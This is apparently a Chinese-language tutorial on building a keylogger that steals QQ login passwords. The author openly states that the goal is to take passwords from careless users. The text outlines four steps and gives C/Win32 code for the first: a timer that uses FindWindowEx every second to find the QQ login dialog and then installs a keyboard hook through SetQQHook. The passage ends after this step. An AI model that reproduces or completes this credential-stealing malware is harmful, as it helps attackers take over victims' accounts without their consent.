一般的盜密碼的軟體的軟體都是通過監視鍵盤來獲得密碼,這樣操作比較方便,但是這樣也存在一定問題,密碼有的時候不是很準確,因為有的人輸入密碼並不是從前到後輸入,當然這樣的人也是少數,盜密碼嘛,當然去得到那些比較粗心的人的密碼! 通過安裝鉤子來監視QQ登陸介面就是獲得密碼的方法,在安裝前得先找到登陸視窗的控制代碼,當鉤子安裝後,記錄鍵盤,當用戶“回車”或是點了“登陸”就可以開始處理密碼了! 我準備分為四部分來說明這個整個過程:
(1)尋找QQ登陸介面。
(2)安裝鉤子
(3)鉤子函式的解釋.
(4)處理密碼。
以下部分全是使用C語言,文章中我假設讀者您是會C/SDK程式設計的。如果遇到相關的概念性問題,您可以檢視MSDN或是上BBS 詢問!
第一部分:(1)尋找QQ登陸介面。
軟體執行後,利用安裝定時器,每秒在系統找QQ登陸介面,這樣基本上只要使用者打開了QQ登陸介面就會被抓住其控制代碼,看下面程式碼:
#define ID_MYTIMER 555
SetTimer(hDlg, ID_MYTIMER, 1000, NULL);
安裝好TIMER後,下面是處理主程式的WM_TIMER訊息,凡是出現沒有定義的變數,您可以理解為是全域性變數.
//處理WM_TIMER程式碼
if (!IsWindow(g_hQQLogin)) //判斷g_hQQLogin是否是有效的視窗控制代碼
{
HWND hLogin=NULL;
g_hQQLogin = NULL;
SetQQHook(NULL); //引數為NULL是解除安裝HOOK,引數為控制代碼是安裝控制代碼
do
{
//利用FindWindowEx查詢QQ登陸視窗,具體引數意思請查MSDN
g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL); //對話方塊的類都是#32770
//找到類名是#32770後,再在其窗體內找一個具有“ 登入QQ”的BUTTON按紐
hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 登入QQ"); //這一句很關鍵,如果你的QQ登陸視窗上沒有" 登入QQ"字樣,那麼獲取密碼將失敗!
}
while(g_hQQLogin != NULL && hLogin == NULL); //直到找到指定的視窗,即:QQ登陸視窗
if (g_hQQLogin != NULL)
{
SetQQHook(g_hQQLogin);//安裝HOOK,此函式在DLL檔案中 第二部分中介紹
}
}
上面就是查詢QQ登陸視窗控制代碼的過程,從程式碼可以看出我用的方法:找一個其子窗體中有一個標題為“ 登入QQ”的BUTTON的對話方塊(這句話說得有點饒口,這句話如果也看不懂,下面您不用看了:() 我最開始是想利用 FindWindow(NULL,"QQ使用者登陸視窗")來查詢,但是我用Spy++看了QQ登陸視窗的標題並不是“QQ使用者登陸視窗”,而是“亂碼”,其中包含了回車鍵等特殊字元,於是我用了FindWindowEx().